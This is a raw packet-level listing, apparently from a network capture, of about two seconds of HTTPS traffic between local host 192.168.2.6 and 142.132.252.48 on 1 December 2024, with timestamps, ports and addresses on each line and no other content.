                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.347589970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.399344921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.508524895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.508552074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.508652925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.508668900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.508727074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.513467073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.513494015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.513541937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.513552904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.513648033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.513648033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.519023895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.519047022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.519113064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.519124985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.519167900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.519167900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.524646997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.524663925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.524720907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.524729013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.524746895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.524775028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.530179024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.530194998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.530257940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.530263901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.530282974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.530333042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.538217068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.538233995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.538285017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.538292885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.538312912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.538347960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.544224024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.544244051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.544289112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.544296980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.544339895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.544349909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.548866987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.548883915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.548944950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.548960924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.548969984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.549061060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.590919971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.709958076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.709983110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.710056067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.710068941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.710092068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.710120916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.712018013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.714684963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.714703083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.714776993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.714776993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.714787006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.714832067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.720598936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.720616102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.720809937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.720834017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.720890999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.725555897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.725574017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.725610018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.725635052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.725728035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.725728035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.731519938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.731537104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.731610060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.731610060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.731621027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.731683016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.732105017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.739631891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.739650011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.739713907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.739720106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.739778996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.739778996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.745309114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.745327950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.745407104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.745407104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.745424986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.745485067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.750361919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.750377893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.750417948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.750432968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.750466108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.750466108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.809412956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.911103964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.911128044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.911379099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.911393881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.911485910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.916003942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.916019917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.916119099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.916126013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.916202068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.921595097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.921612024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.921668053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.921675920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.921691895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.921725035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.923019886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.927198887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.927215099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.927269936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.927278042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.927325010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.932802916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.932826042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.932882071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.932898045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.932951927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.941143990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.941163063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.941265106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.941272020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.941344976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.946918964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.946937084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.947026014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.947033882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.947096109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.948426008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.951976061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.951997042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.952059031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.952064991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.952125072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.952125072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.046699047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.112366915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.112387896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.112488985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.112498999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.112550974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.118211031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.118227005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.118304968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.118304968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.118314028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.118351936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.126058102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.126071930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.126112938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.126120090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.126149893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.126149893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.132546902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.132563114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.132611990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.132628918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.132641077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.132673979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.143794060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.143809080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.143867970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.143876076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.143887043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.143939018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.149733067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.149755001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.149804115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.149810076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.149822950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.149908066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.150229931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.156274080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.156292915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.156373978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.156383991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.156430960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162267923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162682056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162704945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162769079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162774086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162794113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.162817001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.166177988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.451888084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.451914072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452054024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452061892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452092886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452115059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452172995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452172995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452181101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452225924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452344894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452359915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452420950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452428102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452518940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452538013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452574968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452594995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452604055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452637911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452641010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452649117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452701092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452717066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452728033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452733994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452758074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452775002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452792883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452805996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452811003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452837944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452871084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452872038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452887058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452908993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452917099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452931881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452938080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452980995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.452980995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.458353043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.465933084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.515104055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.515122890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.515304089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.515316963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.515434027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.524152040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.524168015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.524224997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.524244070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.524305105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.528992891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778266907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778287888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778368950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778383970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778414965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778422117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778485060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778485060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778565884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778583050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778641939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778645992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778655052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778675079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778692961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778728008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778740883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778755903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778781891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778781891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778867960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778867960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.778876066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:07.780328035 CET44349721142.132.252.48192.168.2.6
